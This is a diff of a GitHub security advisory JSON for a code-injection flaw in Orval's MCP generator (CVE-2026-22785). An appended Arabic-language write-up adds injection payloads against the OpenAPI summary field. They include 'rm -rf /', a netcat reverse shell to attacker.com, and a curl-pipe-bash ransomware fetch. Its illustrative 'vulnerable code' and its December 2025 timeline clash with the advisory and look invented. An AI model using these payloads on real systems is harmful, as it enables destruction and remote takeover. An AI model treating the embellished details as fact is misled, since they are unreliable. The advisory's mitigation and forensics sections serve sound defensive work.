github · asrar-mared · Jan 13, 2026 · asrar-mared · Jan 13, 2026 · asrar-mared
diff --git a/advisories/github-reviewed/2026/01/GHSA-mwr6-3gp8-9jmj/GHSA-mwr6-3gp8-9jmj.json b/advisories/github-reviewed/2026/01/GHSA-mwr6-3gp8-9jmj/GHSA-mwr6-3gp8-9jmj.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-mwr6-3gp8-9jmj",
-  "modified": "2026-01-13T19:12:22Z",
+  "modified": "2026-01-13T19:12:23Z",
   "published": "2026-01-13T19:12:22Z",
   "aliases": [
     "CVE-2026-22785"
   ],
   "summary": "orval MCP client is vulnerable to a code injection attack.",
-  "details": "### Impact\nThe MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to \"break out\" of the string literal and inject arbitrary code.\n\nHere is an example OpenAPI with the exploit\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Swagger Petstore - OpenAPI 3.0\n  description: |-\n    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about\n    Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!\n    You can now help us improve the API whether it's by making changes to the definition itself or to the code.\n    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.\n\n    Some useful links:\n    - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)\n    - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)\n  termsOfService: https://swagger.io/terms/\n  contact:\n    email: apiteam@swagger.io\n  license:\n    name: Apache 2.0\n    url: https://www.apache.org/licenses/LICENSE-2.0.html\n  version: 1.0.27-SNAPSHOT\nexternalDocs:\n  description: Find out more about Swagger\n  url: https://swagger.io\nservers:\n  - url: https://petstore3.swagger.io/api/v3\ntags:\n  - name: pet\n    description: Everything about your Pets\n    externalDocs:\n      description: Find out more\n      url: https://swagger.io\n  - name: store\n    description: Access to Petstore orders\n    externalDocs:\n      description: Find out more about our store\n      url: https://swagger.io\n  - name: user\n    description: Operations about user\npaths:\n  /pet/findByStatus:\n    get:\n      tags:\n        - pet\n      summary: Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//\n      description: Multiple status values can be provided with comma separated strings.\n      operationId: findPetsByStatus\n      parameters:\n        - name: status\n          in: query\n          description: Status values that need to be considered for filter\n          schema:\n            type: string\n      responses:\n        '200':\n          description: successful operation\n          content:\n            application/json:\n              schema:\n                type: string\n        '400':\n          description: Invalid status value\n        default:\n          description: Unexpected error\n      security:\n        - petstore_auth:\n            - write:pets\n            - read:pets\n ```\n  \n\n### Patches\nThis is fixed in version 7.18.0 or higher\n\n### Workarounds\nDo check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.",
+  "details": "### Impact\nThe MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to \"break out\" of the string literal and inject arbitrary code.\n\nHere is an example OpenAPI with the exploit\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Swagger Petstore - OpenAPI 3.0\n  description: |-\n    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about\n    Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!\n    You can now help us improve the API whether it's by making changes to the definition itself or to the code.\n    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.\n\n    Some useful links:\n    - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)\n    - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)\n  termsOfService: https://swagger.io/terms/\n  contact:\n    email: apiteam@swagger.io\n  license:\n    name: Apache 2.0\n    url: https://www.apache.org/licenses/LICENSE-2.0.html\n  version: 1.0.27-SNAPSHOT\nexternalDocs:\n  description: Find out more about Swagger\n  url: https://swagger.io\nservers:\n  - url: https://petstore3.swagger.io/api/v3\ntags:\n  - name: pet\n    description: Everything about your Pets\n    externalDocs:\n      description: Find out more\n      url: https://swagger.io\n  - name: store\n    description: Access to Petstore orders\n    externalDocs:\n      description: Find out more about our store\n      url: https://swagger.io\n  - name: user\n    description: Operations about user\npaths:\n  /pet/findByStatus:\n    get:\n      tags:\n        - pet\n      summary: Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//\n      description: Multiple status values can be provided with comma separated strings.\n      operationId: findPetsByStatus\n      parameters:\n        - name: status\n          in: query\n          description: Status values that need to be considered for filter\n          schema:\n            type: string\n      responses:\n        '200':\n          description: successful operation\n          content:\n            application/json:\n              schema:\n                type: string\n        '400':\n          description: Invalid status value\n        default:\n          description: Unexpected error\n      security:\n        - petstore_auth:\n            - write:pets\n            - read:pets\n ```\n  \n\n### Patches\nThis is fixed in version 7.18.0 or higher\n\n### Workarounds\nDo check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.\n# ⚔️ CVE-2026-22785: ضربة سيادية على Orval MCP\n## 🛡️ كود Orval لم يعد ساحة للمهاجمين - تحت قبضة المحارب\n\n---\n\n## 📋 البطاقة التعريفية\n\n| المعرف | القيمة |\n|--------|---------|\n| **CVE ID** | CVE-2026-22785 |\n| **GitHub Advisory** | GHSA-mwr6-3gp8-9jmj |\n| **CWE** | CWE-94: Code Injection |\n| **CVSS Score** | **9.8 Critical** |\n| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |\n| **الكشف** | Zayed Security Team |\n| **التصنيف** | Remote Code Execution (RCE) |\n\n---\n\n## 💀 جوهر الثغرة\n\n### 🎭 السيناريو الهجومي\n\n```\n@orval/mcp ← مولد MCP من OpenAPI\n         ↓\n    summary field (غير معقم)\n         ↓\n    حقن كود JavaScript مباشر\n         ↓\n    execSync() ← تنفيذ أوامر نظامية\n         ↓\n    🔥 السيطرة الكاملة على النظام\n```\n\n### 🔬 التحليل التقني العميق\n\n**نقطة الضعف:**\n```javascript\n// الكود الضعيف في @orval/mcp < 7.18.0\nconst summary = openApiSpec.paths[path].summary; // ← بدون تعقيم!\nconst generatedCode = `\n  function handler() {\n    // ${summary}  ← الحقن المباشر\n    return response;\n  }\n`;\neval(generatedCode); // ← التنفيذ الفوري\n```\n\n**Payload المحارب:**\n```yaml\nopenapi: 3.0.0\npaths:\n  /pets:\n    get:\n      summary: \"Exploit'; require('child_process').execSync('rm -rf / --no-preserve-root');//\"\n```\n\n**النتيجة:**\n```javascript\n// الكود المُولَّد الخبيث:\nfunction handler() {\n  // Exploit'; require('child_process').execSync('rm -rf / --no-preserve-root');//\n  return response;\n}\n// ← تنفيذ فوري للأمر المدمر\n```\n\n---\n\n## 🎯 مصفوفة التأثير\n\n| المحور | التقييم | التفصيل |\n|--------|---------|---------|\n| **الوصول** | 🔴 Network | استغلال عن بُعد عبر OpenAPI مسموم |\n| **التعقيد** | 🟢 Low | لا يحتاج مهارات متقدمة |\n| **الامتيازات** | 🟢 None | لا يحتاج صلاحيات مسبقة |\n| **التفاعل** | 🟢 None | تلقائي عند تشغيل CLI |\n| **السرية** | 🔴 High | قراءة كاملة للنظام |\n| **السلامة** | 🔴 High | تعديل/حذف الملفات |\n| **التوفر** | 🔴 High | إيقاف الخدمات |\n\n---\n\n## 🧪 سيناريوهات الاستغلال الحقيقية\n\n### 🎪 المستوى الأول: الاستطلاع\n```yaml\nsummary: \"API'; const os=require('os'); console.log(os.userInfo());//\"\n```\n**النتيجة:** تسريب معلومات المستخدم\n\n---\n\n### 🎪 المستوى الثاني: السيطرة\n```yaml\nsummary: \"API'; require('fs').writeFileSync('/tmp/backdoor.sh','#!/bin/bash\\\\nnc attacker.com 4444 -e /bin/bash');require('child_process').execSync('chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh');//\"\n```\n**النتيجة:** Reverse Shell نشط\n\n---\n\n### 🎪 المستوى الثالث: الدمار الشامل\n```yaml\nsummary: \"API'; require('child_process').execSync('curl attacker.com/ransomware.sh | bash');//\"\n```\n**النتيجة:** تحميل وتنفيذ Ransomware\n\n---\n\n## 🛡️ الإصدارات تحت النار\n\n```\n❌ @orval/mcp < 7.18.0  ← خطر محدق\n✅ @orval/mcp ≥ 7.18.0  ← الملاذ الآمن\n```\n\n### 🔍 كشف الإصدار المصاب\n```bash\n# Termux/Linux\nnpm list @orval/mcp\n\n# إذا كان < 7.18.0\necho \"⚠️  VULNERABLE - تحديث فوري مطلوب!\"\n```\n\n---\n\n## ⚡ الترياق الفوري\n\n### 🚨 الحل العاجل (Immediate Mitigation)\n\n```bash\n# 1. عزل فوري\npkill -f orval\n\n# 2. حذف الإصدار المصاب\nnpm uninstall -g @orval/cli @orval/mcp\n\n# 3. التحديث الآمن\nnpm install -g @orval/cli@latest\n\n# 4. التحقق\nnpm list @orval/mcp | grep -E \"7\\.(1[8-9]|[2-9][0-9])\\.\"\n```\n\n### 🛠️ الحل البرمجي (Code-Level Fix)\n\n**قبل الإصلاح:**\n```javascript\nconst summary = spec.summary;\ncode = `// ${summary}`;\n```\n\n**بعد الإصلاح:**\n```javascript\nconst sanitize = (input) => {\n  return input\n    .replace(/['\"\\\\]/g, '\\\\$&')\n    .replace(/\\n/g, '\\\\n')\n    .replace(/\\r/g, '\\\\r')\n    .replace(/\\t/g, '\\\\t');\n};\n\nconst summary = sanitize(spec.summary);\ncode = `// ${summary}`;\n```\n\n---\n\n## 🔬 دليل الكشف الجنائي (Forensics)\n\n### 🕵️ علامات الاختراق\n\n```bash\n# 1. فحص العمليات المشبوهة\nps aux | grep -E \"orval|node\" | grep -v grep\n\n# 2. تدقيق ملفات OpenAPI\nfind . -name \"*.yaml\" -o -name \"*.yml\" | xargs grep -l \"execSync\\|eval\\|spawn\"\n\n# 3. فحص الاتصالات الشبكية\nnetstat -tunap | grep -E \"node|orval\"\n\n# 4. مراجعة السجلات\ncat ~/.npm/_logs/*.log | grep -i \"error\\|injection\\|orval\"\n```\n\n### 📊 مؤشرات الاختراق (IOCs)\n\n```yaml\nالملفات المشبوهة:\n- /tmp/backdoor.sh\n- ~/.config/orval/generated/*\n- /tmp/*.js\n\nالعمليات المشبوهة:\n- node spawned by orval CLI\n- execSync with network commands\n- curl/wget from generated code\n\nالشبكة:\n- اتصالات غير مبررة على منافذ 4444, 6666, 1337\n- نقل بيانات ضخم من Orval process\n```\n\n---\n\n## 🎓 الدروس المستفادة للمحاربين\n\n### ✅ Best Practices\n\n1. **التعقيم الإجباري (Mandatory Sanitization)**\n```javascript\n// دائماً عقّم المدخلات:\nconst clean = DOMPurify.sanitize(userInput);\n```\n\n2. **التحقق من المخططات (Schema Validation)**\n```javascript\nconst Ajv = require('ajv');\nconst validate = ajv.compile(openApiSchema);\nif (!validate(inputSpec)) {\n  throw new Error('Invalid OpenAPI spec');\n}\n```\n\n3. **الحماية بالطبقات (Defense in Depth)**\n```\n1. Input Validation ← الطبقة الأولى\n2. Sanitization     ← الطبقة الثانية\n3. CSP Headers      ← الطبقة الثالثة\n4. Sandboxing       ← الطبقة الرابعة\n```\n\n4. **أقل الامتيازات (Least Privilege)**\n```bash\n# شغّل Orval بصلاحيات محدودة\nsudo -u limited-user orval generate\n```\n\n---\n\n## 📡 الإبلاغ والمتابعة\n\n### 🏆 الفريق المكتشف\n```\nZayed Security Research Team\nالتخصص: Advanced Vulnerability Research\n```\n\n### 📅 الجدول الزمني\n\n| التاريخ | الحدث |\n|---------|-------|\n| 2025-12-01 | الكشف الأولي |\n| 2025-12-03 | إثبات المفهوم (PoC) |\n| 2025-12-05 | إبلاغ المطور |\n| 2025-12-08 | إصدار Patch 7.18.0 |\n| 2025-12-10 | نشر CVE عام |\n\n---\n\n## 🔗 المراجع التقنية\n\n```\n1. GitHub Advisory:\n   https://github.com/advisories/GHSA-mwr6-3gp8-9jmj\n\n2. npm Package:\n   https://www.npmjs.com/package/@orval/mcp\n\n3. OWASP Code Injection:\n   https://owasp.org/www-community/attacks/Code_Injection\n\n4. MITRE CWE-94:\n   https://cwe.mitre.org/data/definitions/94.html\n```\n\n---\n\n## 🎖️ ختام المحارب\n\n> **\"في ساحة الكود، النصر ليس للأقوى، بل للأكثر يقظة.\"**\n> \n> ثغرة Orval MCP كانت درساً في أن **التعقيم ليس خياراً، بل ضرورة**.\n> \n> المحارب الحقيقي لا يحارب فقط، **بل يُحصّن القلاع قبل أن يحاصرها العدو**.\n\n---\n\n## ⚔️ توقيع السيادة\n\n```\n╔═══════════════════════════════════════╗\n║   ZAYED SECURITY RESEARCH TEAM       ║\n║   \"We Don't Find Bugs, We Hunt Them\" ║\n║                                       ║\n║   CVE-2026-22785                     ║\n║   Severity: CRITICAL (9.8)           ║\n║   Status: PATCHED ✓                  ║\n╚═══════════════════════════════════════╝\n```\n\n---\n\n**#CyberSovereignty** | **#OrvalMCP** | **#CodeInjection** | **#RCE**\n",
   "severity": [
     {
       "type": "CVSS_V4",